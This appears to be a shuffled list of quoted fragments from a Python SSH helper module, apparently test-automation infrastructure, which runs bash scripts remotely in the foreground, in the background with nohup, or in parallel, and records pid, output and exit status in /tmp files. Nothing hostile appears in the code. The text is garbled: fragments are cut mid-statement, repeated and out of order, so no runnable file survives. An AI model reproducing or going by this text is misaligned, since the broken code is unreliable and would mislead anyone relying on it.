"i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)] joined_script_commands",
"Exception as e: e.args += ('When running bash script \"%s\"' % command), raise",
"err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename,",
"out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename,",
"parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as e: raise Exception(\"Failed",
"stdout, output_timeout): output_array = [] try: while True: segment = stdout.read().decode('utf-8') if segment",
"e return \"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport() chan = transport.open_session() try:",
"= self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\" % (out_filename, err_filename)) command =",
"command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait",
"= os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename =",
"finally: chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base +",
"err_filename = random_base + \".err\" status_filename = random_base + \".retcode\" command = \"\\n\".join([",
"\".out\" err_filename = random_base + \".err\" status_filename = random_base + \".retcode\" command =",
"{completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally:",
"stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status !=",
"* 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script,",
"self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60): return",
"or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script,",
"echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir,",
"random_base + \".err\" status_filename = random_base + \".retcode\" command = \"\\n\".join([ \"nohup sh",
"stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout = output stdout.close() stderr.close()",
"import background, parallel import tempfile import os import subprocess from subprocess import CalledProcessError",
"bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs =",
"\"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"])",
"stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close()",
"command) finally: chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base",
"scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as e: raise Exception(\"Failed running",
"chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout) status =",
"base_dir) except Exception as e: e.args += ('When running bash script \"%s\"' %",
"status_filename) except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" % (scripts,",
"import tempfile import os import subprocess from subprocess import CalledProcessError class Run(object): def",
"raise Exception(\"Failed running '%s', status '%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename,",
"raise def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename",
"status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\"",
"= logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self,",
"transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1)",
"chan = transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if status != 0: raise",
"\" 1>%s 2>%s &\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir,",
"transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status, command)",
"return \"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command)",
"failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr)",
"--no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts,",
"0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode,",
"subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout = output stdout.close() stderr.close() self._logger.debug(\"SSH command: %(command)s\",",
"transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if status",
"joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd",
"except Exception as e: e.args += ('When running bash script \"%s\"' % command),",
"\"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \" 1>%s 2>%s &\" % (out_filename, err_filename))",
"tempfile import os import subprocess from subprocess import CalledProcessError class Run(object): def __init__(self,",
"0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir,",
"\"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"])",
"output was\\n:%s\" % ( output_timeout, output)) e.output = output raise e return \"\".join(output_array)",
"completed_process.stderr) return completed_process finally: chan.close() def _read_output(self, stdout, output_timeout): output_array = [] try:",
"status_filename = random_base + \".retcode\" command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >&",
"tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\")",
"60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\",",
"stderr = chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error",
"output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e = socket.timeout( \"Timeout executing, no input",
"was\\n:%s\" % ( output_timeout, output)) e.output = output raise e return \"\".join(output_array) def",
"from automation_infra.plugins import background, parallel import tempfile import os import subprocess from subprocess",
"_parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands = [\"((%(script)s",
"status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands",
"$!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command)",
"return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script))",
"chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8')",
"try: self._exec(command) except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" %",
"<< 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" %",
"= \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir)",
"* 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash",
"tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd])",
"$!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return",
"base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename =",
"\".err\" status_filename = random_base + \".retcode\" command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'",
"+ \".retcode\" command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s",
"as e: e.args += ('When running bash script \"%s\"' % command), raise def",
"raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename",
"err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e: raise Exception(\"Failed running",
"'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict(",
"max_jobs=None, output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command",
"-1) stdout = chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout,",
"<< 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command, output_timeout=20 * 60):",
"CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def",
"segment == \"\": break output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e = socket.timeout(",
"random_base + \".pid\" out_filename = random_base + \".out\" err_filename = random_base + \".err\"",
"\"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts,",
"\"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" %",
"stdin.close() output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process =",
"= \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands,",
"== \"\": break output_array.append(segment) except socket.timeout: output = \"\".join(output_array) e = socket.timeout( \"Timeout",
"out_filename, err_filename, status_filename) except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\"",
"self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command {command} failed with errorcode",
"scripts, max_jobs, \" 1>%s 2>%s &\" % (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\"",
"\\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args, completed_process.stdout, completed_process.stderr) return completed_process finally: chan.close() def _read_output(self,",
"out_filename = random_base + \".out\" err_filename = random_base + \".err\" status_filename = random_base",
"def _read_output(self, stdout, output_timeout): output_array = [] try: while True: segment = stdout.read().decode('utf-8')",
"_read_output(self, stdout, output_timeout): output_array = [] try: while True: segment = stdout.read().decode('utf-8') if",
"segment = stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment) except socket.timeout: output =",
"output = self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command,",
"output_timeout) def execute(self, command, output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan = transport.open_session()",
"output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception as e: e.args += ('When running",
"= chan.makefile('rb', -1) stderr = chan.makefile_stderr('rb', -1) stdin.close() output = self._read_output(stdout, output_timeout) status",
"= random_base + \".retcode\" command = \"\\n\".join([ \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null",
"[] try: while True: segment = stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment)",
"raise e return \"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport() chan = transport.open_session()",
"chan.exec_command(command) status = chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status, command) finally: chan.close()",
"command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\",",
"% base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo",
"output_timeout=20 * 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command =",
"try: chan.exec_command(command) status = chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status, command) finally:",
"i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT'",
"dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command {command} failed with",
"\"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command, output_timeout=20",
"logging from automation_infra.plugins import background, parallel import tempfile import os import subprocess from",
"= os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs, \"",
"import logging from automation_infra.plugins import background, parallel import tempfile import os import subprocess",
"= tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir,",
"pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice",
"% (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20 * 60): base_dir",
"try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename) except CalledProcessError as",
"\"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self,",
"parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts, base_dir) except Exception as e: e.args",
"command), raise def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\")",
"import socket import logging from automation_infra.plugins import background, parallel import tempfile import os",
"1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir,",
"script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout)",
"self._exec(command) except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" % (bash_script,",
"'%s'. Partial output was\\n:%s\" % ( output_timeout, output)) e.output = output raise e",
"= self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command,",
"$?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self,",
"%(command)s\", dict(command=command)) self._logger.debug(\"Execution output: %(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command {command} failed",
"out_filename, err_filename, status_filename) def _parallel_commands(self, base_dir, scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or",
"self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise CalledProcessError(completed_process.returncode, completed_process.args,",
"os.path.join(base_dir, \"parallel.out\") err_filename = os.path.join(base_dir, \"parallel.err\") status_filename = os.path.join(base_dir, \"parallel.status\") parallel_cmd = self._parallel_commands(base_dir,",
"command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self, scripts,",
"input for timeout of '%s'. Partial output was\\n:%s\" % ( output_timeout, output)) e.output",
"pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e: raise Exception(\"Failed running '%s',",
"def script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([",
"&\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script, out=out_filename, err=err_filename,",
"subprocess import CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger =",
"= max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\"",
"+= ('When running bash script \"%s\"' % command), raise def background_parallel(self, scripts, max_jobs=None):",
"def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\" out_filename",
"% (out_filename, err_filename)) command = \"\\n\".join([\"mkdir %s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'",
"% command), raise def background_parallel(self, scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir,",
"status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) return parallel.BackgroundParallel(self, scripts, base_dir, pid_filename, out_filename, err_filename, status_filename)",
"return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def",
"scripts, max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s&",
"status = chan.recv_exit_status() if status != 0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def",
"dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def",
"dir='/tmp/') pid_filename = random_base + \".pid\" out_filename = random_base + \".out\" err_filename =",
"= socket.timeout( \"Timeout executing, no input for timeout of '%s'. Partial output was\\n:%s\"",
"i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands)",
"= tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir,",
"if status != 0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr:",
"executing, no input for timeout of '%s'. Partial output was\\n:%s\" % ( output_timeout,",
"<< 'PARALLEL_SCRIPT' %s\" % (max_jobs, command_suffix), joined_script_commands, \"PARALLEL_SCRIPT\\n\"]) def parallel(self, scripts, max_jobs=None, output_timeout=20",
"script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d << 'PARALLEL_SCRIPT' %s\"",
"bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command, output_timeout=20 * 60): transport =",
"% ( output_timeout, output)) e.output = output raise e return \"\".join(output_array) def _exec(self,",
"out=out_filename, err=err_filename, pid=pid_filename, status=status_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try: self._exec(command) except CalledProcessError as e: raise Exception(\"Failed",
"= random_base + \".out\" err_filename = random_base + \".err\" status_filename = random_base +",
"echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename, pid=pid_filename), \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) try:",
"error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout = output",
"chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout) stdin = chan.makefile('wb', -1) stdout = chan.makefile('rb',",
"!= 0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}: \\nstdout: {completed_process.stdout} \\nstderr: {completed_process.stderr}') raise",
"except CalledProcessError as e: raise Exception(\"Failed running '%s', status '%s'\" % (bash_script, e.returncode))",
"self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status() if status != 0:",
"status != 0: raise subprocess.CalledProcessError(status, command) finally: chan.close() def background_script(self, bash_script): random_base =",
"2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i),",
"max_jobs, command_suffix=\"\"): max_jobs = max_jobs or 0 script_commands = [\"((%(script)s 1>%(out)s 2>%(err)s& echo",
"script_v2(self, bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh",
"$!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for",
"/dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename, status=status_filename,",
"_exec(self, command): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status = chan.recv_exit_status()",
"bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def script_v2(self, bash_script, output_timeout=20 * 60):",
"random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\" out_filename = random_base +",
">& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=parallel_cmd, out=out_filename, err=err_filename,",
"= self._read_output(stdout, output_timeout) status = chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status)",
"bash_script, output_timeout=20 * 60): self._logger.debug(\"Running bash script:\\n\\n%(bash_script)s\\n\", dict(bash_script=bash_script)) command = \"\\n\".join([ \"sh <<",
"for i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel --no-notice --jobs=%d <<",
"output: %(output)s\", dict(output=output)) if status != 0: self._logger.debug(f'command {command} failed with errorcode {completed_process.returncode}:",
"'%s'\" % (bash_script, e.returncode)) return background.Background(self, bash_script, pid_filename, out_filename, err_filename, status_filename) def _parallel_commands(self,",
"command, output_timeout=20 * 60): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) chan.settimeout(output_timeout)",
"out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)]",
"i), pid=parallel.Parallel.pidfile(base_dir, i)) for i, script in enumerate(scripts)] joined_script_commands = \"\\n\".join(script_commands) return \"\\n\".join([\"parallel",
"$!>%(pid)s;wait $!);echo $?>%(status)s)\" % dict(script=script, out=parallel.Parallel.outfile(base_dir, i), err=parallel.Parallel.errfile(base_dir, i), status=parallel.Parallel.statusfile(base_dir, i), pid=parallel.Parallel.pidfile(base_dir, i))",
"\"\".join(output_array) def _exec(self, command): transport = self._ssh_client.get_transport() chan = transport.open_session() try: chan.exec_command(command) status",
"scripts, max_jobs=None): base_dir = tempfile.mktemp(dir='/tmp/') pid_filename = os.path.join(base_dir, \"parallel.pid\") out_filename = os.path.join(base_dir, \"parallel.out\")",
"class Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh') def script(self,",
">& /dev/null &\", \"(%(bash_script)s 1>%(out)s 2>%(err)s& echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict( bash_script=bash_script,",
"60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir %s\"",
"base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\"",
"True: segment = stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment) except socket.timeout: output",
"max_jobs) command = \"\\n\".join([\"mkdir %s\" % base_dir, parallel_cmd]) try: self.execute(command, output_timeout) return parallel.Parallel(self,",
"= \"\".join(output_array) e = socket.timeout( \"Timeout executing, no input for timeout of '%s'.",
"= \"\\n\".join([ \"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF'\", bash_script, \"RACKATTACK_SSH_RUN_SCRIPT_EOF\\n\"]) return self.execute(command, output_timeout) def execute(self, command,",
"sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait $!);echo $?>%(status)s\" % dict(",
"while True: segment = stdout.read().decode('utf-8') if segment == \"\": break output_array.append(segment) except socket.timeout:",
"for timeout of '%s'. Partial output was\\n:%s\" % ( output_timeout, output)) e.output =",
"import CalledProcessError class Run(object): def __init__(self, ssh_client): self._ssh_client = ssh_client self._logger = logging.getLogger('ssh')",
"e: e.args += ('When running bash script \"%s\"' % command), raise def background_parallel(self,",
"e = socket.timeout( \"Timeout executing, no input for timeout of '%s'. Partial output",
"* 60): base_dir = tempfile.mktemp(dir='/tmp/') parallel_cmd = self._parallel_commands(base_dir, scripts, max_jobs) command = \"\\n\".join([\"mkdir",
"self._logger = logging.getLogger('ssh') def script(self, bash_script, output_timeout=20 * 60): return self.script_v2(bash_script, output_timeout).stdout def",
"chan.recv_exit_status() error = stderr.read().decode('utf-8') completed_process = subprocess.CompletedProcess(command, status) completed_process.stderr = error completed_process.stdout =",
"parallel.Parallel(self, scripts, base_dir) except Exception as e: e.args += ('When running bash script",
"( output_timeout, output)) e.output = output raise e return \"\".join(output_array) def _exec(self, command):",
"%s\" % base_dir, \"nohup sh << 'RACKATTACK_SSH_RUN_SCRIPT_EOF' >& /dev/null &\", \"(%(bash_script)s echo $!>%(pid)s;wait",
"chan.close() def background_script(self, bash_script): random_base = tempfile.mktemp(prefix='background', dir='/tmp/') pid_filename = random_base + \".pid\"",
